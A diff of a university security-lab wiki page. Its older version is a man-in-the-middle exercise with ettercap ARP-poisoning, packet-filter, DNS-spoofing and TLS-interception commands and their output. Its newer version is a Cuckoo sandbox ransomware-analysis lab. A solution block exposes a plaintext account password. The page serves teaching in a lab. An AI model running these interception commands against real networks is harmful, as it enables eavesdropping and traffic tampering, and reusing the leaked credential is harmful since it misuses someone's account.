Differences
This shows you the differences between two versions of the page.
|
cdci:labs:4 [2020/03/15 13:07] mihai.chiroiu [07. [10p] HTTPS traffic inspection] |
cdci:labs:4 [2025/01/21 19:24] (current) mihai.chiroiu |
||
|---|---|---|---|
| Line 1: | Line 1: | ||
| - | ====== Lab04. Man-in-the-middle attack ====== | + | ====== Lab04. Cuckoo sandboxing ====== |
| ===== Objectives ===== | ===== Objectives ===== | ||
| - | * MITM using ettercap tool | + | * Investigate a possible malware using automatic tools |
| - | * Wireshark usage for protocol dissection - DNS | + | * Use the cuckoo sandbox automated malware analysis system |
| - | * Understanding attacks on ARP | + | * Introduction to basic Linux command line |
| - | * Learning different types of MITM | + | |
| ===== Topology ===== | ===== Topology ===== | ||
| - | {{ :cdci:labs:cdci_lab04-mitm-topology.png?direct&600 |}} | + | For this exercise you will need the [[https://drive.google.com/open?id=11WTT3NYUfVk7UopVnUc-uf9SKgvzIcOf |malware archive]]. |
| + | You will also need a Linux environment with Cuckoo sandbox installed and a running Windows VM. One can be downloaded from [[ https://drive.google.com/file/d/14-7DqZ1jNKuqxr73Wk8TcTylRl7tNKNk/view?usp=sharing | here]]. | ||
| ===== Tasks ===== | ===== Tasks ===== | ||
| - | ==== 01. [5p] Virtual machine setup ==== | + | ==== 01. [10p] Virtual machine setup ==== |
| - | First, make sure that your virtual machine is updated (run the provided update.sh script, or create one). | + | You will need to have Linux VM (we have tested with Ubuntu 20.04) and then install the [[https://cuckoo.readthedocs.io/en/latest/installation/host/installation/ | Cuckoo sandbox on top of it]]. You can access Cuckoo sandbox from a browser, and to limit the impact of the malware analysis process please do so from the same VM (i.e. install a graphical server and a browser on the Linux VM). |
| - | <code> | + | |
| - | root@cdci:/# cat update.sh | + | |
| - | #!/bin/bash | + | |
| - | # (c) Mihai Chiroiu - CDCI | + | |
| - | + | ||
| - | git clone -b labs --single-branch https://github.com/mihai-chiroiu/cdci.git | + | |
| - | git config user.email "student@upb.ro" | + | |
| - | </code> | + | |
| - | Next, in one terminal start the provided Mininet topology. | ||
| <code> | <code> | ||
| - | root@cdci:/# cd cdci/lab04 | + | $startx (to start the graphical interface) |
| - | root@cdci:/# /usr/bin/python3 topology.py | + | |
| </code> | </code> | ||
| - | If there are any problems with starting the topology (if all is good you should see the Mininet prompt ">") use the given cleanup script and try to restart the topology. | + | After the installation you need to power on the cuckoo sandbox system using the following commands. To verify that cuckoo sandboxing is running open the [[http://127.0.0.1:8000 | hxxp://127.0.0.1:8000]] into a browser. |
| - | + | ||
| - | ==== 02. [5p] Internet connectivity ==== | + | |
| - | + | ||
| - | Before you begin, make sure that you have Internet connectivity on all two nodes (attacker and victim). R1 should be the gateway for the Attacker and Victim. Write down the MAC and IP addresses of all 3 nodes (including the gateway). | + | |
| - | + | ||
| - | ==== 03. [20p] Virtual machine setup ==== | + | |
| - | + | ||
| - | The goal of this exercise is to pass all the victim's traffic through the attacker's machine. From the Attacker node start an ARP poisoning mitm attack against the Victim machine using ettercap tool. Use “ping” tool from Victim and make sure that all traffic (including to outside) goes through the Attacker’s node (use extra verbose option for ettercap). | + | |
| - | + | ||
| - | <note tip> | + | |
| - | Make sure that you enable remote sniffing. To exit ettercap simply press Q. | + | |
| - | </note> | + | |
| - | + | ||
| - | Use tcpdump to save all the traffic from the victim and analyze it using Wireshark. Try to answer the following questions: | + | |
| - | * Can you spot the Gratuitous ARP packet sent when infecting the victim? | + | |
| - | * Look into the layer 2 of the packets and see how the destination MAC address has changed under the attack. | + | |
| - | * Can you spot the Gratuitous ARP packet when the infection is stopped? | + | |
| - | + | ||
| - | <solution> | + | |
| <code> | <code> | ||
| - | root@attacker:/# ettercap -E -T -M ARP:remote /192.168.16.100// /192.168.16.1// | + | $cuckoo web runserver |
| - | + | $cuckoo -d (!!! do not run as sudo) | |
| - | ettercap 0.8.3 copyright 2001-2019 Ettercap Development Team | + | |
| - | + | ||
| - | Listening on: | + | |
| - | attacker-eth0 -> FE:14:85:E7:5F:D0 | + | |
| - | 192.168.16.2/255.255.255.0 | + | |
| - | * |==================================================>| 100.00 % | + | |
| - | [...] | + | |
| - | + | ||
| - | Sat Mar 14 20:39:26 2020 [835705] | + | |
| - | D2:5D:2C:AD:D4:F5 --> FE:14:85:E7:5F:D0 | + | |
| - | 192.168.16.100:0 --> 8.8.8.8:0 | P (0) | + | |
| - | + | ||
| - | + | ||
| - | root@attacker:/# tcpdump -n -i Attacker-eth0 -w mitm.pcap | + | |
| </code> | </code> | ||
| - | </solution> | ||
| - | ==== 04. [10p] Traffic dissection ==== | + | Next, inside your Linux VM one needs to run a second VM with Windows. This one is used by the Cuckoo framework to do the automatic malware analysis. Follow the tutorials available and make sure that the Windows VM is available. In the case of misconfigured guest VM (i.e., the Windows 7 VirtualBox VM), you can reset it to the initial configuration. [[https://cuckoo.readthedocs.io/en/latest/installation/guest/saving/|1]] |
| + | - Delete any existing snapshots. | ||
| + | - Power on the virtual machine. | ||
| + | - Create a new snapshot <code> VBoxManage snapshot "win7cuckoo" take "original" --pause </code> | ||
| + | - Power of the virtual machine <code> VBoxManage controlvm "win7cuckoo" poweroff </code> | ||
| + | - Restore the virtual machine to use the previously created snapshot. <code> VBoxManage snapshot "win7cuckoo" restorecurrent </code> | ||
| - | Investigate the following traffic as it is generated by the Victim node: | + | All this setup is already done in the following VM [[https://drive.google.com/file/d/14-7DqZ1jNKuqxr73Wk8TcTylRl7tNKNk/view?usp=sharing]] |
| - | * HTTP and DNS while under MITM attack. Can you use Wireshark and rebuild/export the HTML pages that the victim opened (use wget or curl)?. | + | |
| - | <note tip> | + | ==== 02. [30p] Malware analysis ==== |
| - | Transfer the pcap file to your local computer and open it in wireshark. Then select File->Export HTML Objects. | + | |
| - | </note> | + | |
| - | ==== 05. [10p] Raw packets altering ==== | + | To start the malware investigation, submit the received files using the dashboard and select Analyze from the “Configure your Analysis” page. Please configure a 500 seconds Timeout to allow enough time for execution and make sure that the package type is “exe” from the left-side panel for a proper lunch. |
| - | Ettercap filters can also be used to modify packets as they pass through the attacker’s node. Use the provided filter to change icmp type from echo to reply (Hint: [[https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml]]). | + | * Once the process has started, you should be able to see the progress in the terminal where the cuckoo daemon was lunched. Moreover, the Windows 7 pre-configured virtual machine should be started, and the malware launched. |
| - | * You should observe the changes on the victim (no more replies). | + | {{ :cdci:labs:cdci_lab02_cuckoo-sandbox-vm.jpg?direct&600 |}} |
| - | * Use tcpdump on the attacker to inspect the changes. | + | * Observe that the python agent within the Windows 7 has launched the malware and is monitoring it. You should also be able to see the random mouse movements. Why is this happening? |
| - | <note tip> | + | ==== 03. [20p] Report overview ==== |
| - | [[https://linux.die.net/man/8/etterfilter]] | + | |
| - | </note> | + | |
| - | <code> | + | After the report has been generated, you should be able to answer the following questions. |
| - | cat icmp.filter | + | |
| - | if (ip.proto == ICMP) { | + | |
| - | msg("Changing address!\n"); | + | |
| - | replace("8.8.8.8", "8.8.4.4"); | + | |
| - | } | + | |
| - | </code> | + | |
| - | <solution> | + | - What is the executable file format? What is the Original Filename of the executable? |
| - | <code> | + | - What is the hash (preferable SHA2 family) of the malware? Can you find it on [[http://www.virustotal.com | hxxp://www.virustotal.com]]? |
| - | cat icmp.filter | + | - What command is executed to allow access to all files? |
| - | if (ip.proto == ICMP) { | + | - Which DNS records are recorded during the analysis? |
| - | msg("Changing ICMP type!\n"); | + | - What registry entries does the malware add? |
| - | replace("8.8.8.8", "8.8.4.4"); | + | |
| - | } | + | |
| - | etterfilter icmp.filter -o icmp.ef | + | |
| - | ettercap -T -F icmp.ef -M ARP:remote /192.168.16.100// /192.168.16.1// | + | |
| - | </code> | + | |
| - | </solution> | + | |
| + | ==== 04. [30p] More result analysis ==== | ||
| + | All the monitored actions are stored by Cuckoo in the “.cuckoo” configuration folder under the storage directory. | ||
| + | * Find in what languages is the support message from the malware available. | ||
| + | * Which files were encrypted during the process? | ||
| + | * Have a look at the captured traffic using Wireshark. | ||
| - | ==== 06. [10p] DNS traffic altering ==== | + | ==== 05. [10p] Custom rules for automated analysis ==== |
| - | Another interesting plugin of Ettercap is DNS spoofing. Config it such that any queries for the “facebook.com” domain name are translated into “127.0.0.1”. | + | Cuckoo sandbox has a lot of extra tools that it can use for deeper analysis, including snort IDS, IDA for binary or Yara for signature matching. The Yara rules can be run against the binary itself, against the memory dump or accessed URLs. In this exercise we are going to use the Yara rules available on the following github [[https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_MS17-010_Wannacrypt.yar | repository]]. Just copy them in the yara configuration directory and re-run the analysis. |
| - | <note tip> | + | ==== 06. [Bonus 10p] Custom rules for automated analysis ==== |
| - | [[https://linux.die.net/man/8/ettercap_plugins]] | + | |
| - | </note> | + | |
| - | <solution> | + | Redo the analysis using the https://any.run/ platform. |
| - | <code> | + | |
| - | root@attacker:~# cat /etc/ettercap/etter.dns | + | |
| - | www.facebook.com A 127.0.0.1 | + | |
| - | root@attacker:/# ettercap -P dns_spoof -E -T -M ARP:remote /192.168.16.100// /192.168.16.1// | + | |
| - | + | ||
| - | Listening on: | + | |
| - | attacker-eth0 -> 1E:D4:8A:37:43:CD | + | |
| - | 192.168.16.2/255.255.255.0 | + | |
| - | * |==================================================>| 100.00 % | + | |
| - | Activating dns_spoof plugin... | + | |
| - | + | ||
| - | Sat Mar 14 21:22:44 2020 [161164] | + | |
| - | CE:82:B8:0E:6B:72 --> 1E:D4:8A:37:43:CD | + | |
| - | UDP 192.168.16.100:48445 --> 172.30.0.2:53 | (34) | + | |
| - | A............www.facebook.com.....dns_spoof: A [www.facebook.com] spoofed to [127.0.0.1] TTL [3600 s] | + | |
| - | + | ||
| - | + | ||
| - | root@victim:/# nslookup www.facebook.com | + | |
| - | Non-authoritative answer: | + | |
| - | www.facebook.com canonical name = star-mini.c10r.facebook.com. | + | |
| - | Name: star-mini.c10r.facebook.com | + | |
| - | Address: 157.240.221.35 | + | |
| - | [...] | + | |
| - | root@victim:/# nslookup www.facebook.com | + | |
| - | Name: www.facebook.com | + | |
| - | Address: 127.0.0.1 | + | |
| - | </code> | + | |
| - | </solution> | + | |
| - | ==== 07. [10p] HTTPS traffic inspection ==== | + | |
| - | + | ||
| - | Unfortunately, HTTPS traffic cannot be inspected, or can it :). We will try to use ettercap and observe changes in the certificate chain when MITM attack is active. | + | |
| - | * First, use the “openssl s_client” tool (or other) to see the certificates path for the “www.google.com” website. <code> root@victim:~# openssl s_client -showcerts www.google.com:443 | + | |
| - | CONNECTED(00000005) | + | |
| - | depth=2 OU = GlobalSign Root CA - R2, O = GlobalSign, CN = GlobalSign | + | |
| - | verify return:1 | + | |
| - | depth=1 C = US, O = Google Trust Services, CN = GTS CA 1O1 | + | |
| - | verify return:1 | + | |
| - | depth=0 C = US, ST = California, L = Mountain View, O = Google LLC, CN = www.google.com | + | |
| - | verify return:1 | + | |
| - | </code> | + | |
| - | * Next, run ettercap without TLS MITM (-S). | + | |
| - | * Now, run ettercap including TLS MITM. | + | |
| <solution> | <solution> | ||
| - | <code> | + | For any.run use the student.cdci@totococo.fr.nf / "2YGt@pS5TtqUEkS" account |
| - | root@victim:/# openssl s_client -showcerts www.cisco.com:443 | + | |
| - | CONNECTED(00000005) | + | |
| - | depth=1 C = US, O = HydrantID (Avalanche Cloud Corporation), CN = HydrantID SSL ICA G2 | + | |
| - | verify error:num=20:unable to get local issuer certificate | + | |
| - | --- | + | |
| - | Certificate chain | + | |
| - | 0 s:C = US, ST = California, L = San Jose, O = "Cisco Systems, Inc.", CN = www.cisco.com | + | |
| - | i:C = US, O = HydrantID (Avalanche Cloud Corporation), CN = HydrantID SSL ICA G2 | + | |
| - | -----BEGIN CERTIFICATE----- | + | |
| - | [...] | + | |
| - | closed | + | |
| - | + | ||
| - | + | ||
| - | + | ||
| - | ettercap -E -T -M ARP:remote /192.168.16.100// /192.168.16.1// -S | + | |
| - | </code> | + | |
| </solution> | </solution> | ||
